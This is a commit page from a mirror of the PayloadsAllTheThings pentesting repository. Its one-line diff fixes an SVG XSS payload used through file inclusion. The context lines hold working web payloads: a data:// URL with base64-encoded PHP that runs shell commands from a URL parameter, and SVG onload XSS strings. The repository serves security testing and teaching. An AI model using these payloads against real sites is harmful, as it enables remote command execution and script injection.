mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Bug SVG payload
This commit is contained in:
parent
3eac989551
commit
b44215ef6e
1 changed files with 1 additions and 1 deletions
|
@ -31,7 +31,7 @@ http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbW
|
|||
```
|
||||
|
||||
|
||||
XSS via RFI/LFI with "<svg<svg onload=alert(1)>onload=alert(1)>" payload
|
||||
XSS via RFI/LFI with "<<svg<>svg onload=alert(1)>onload=alert(1)>" payload
|
||||
```
|
||||
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue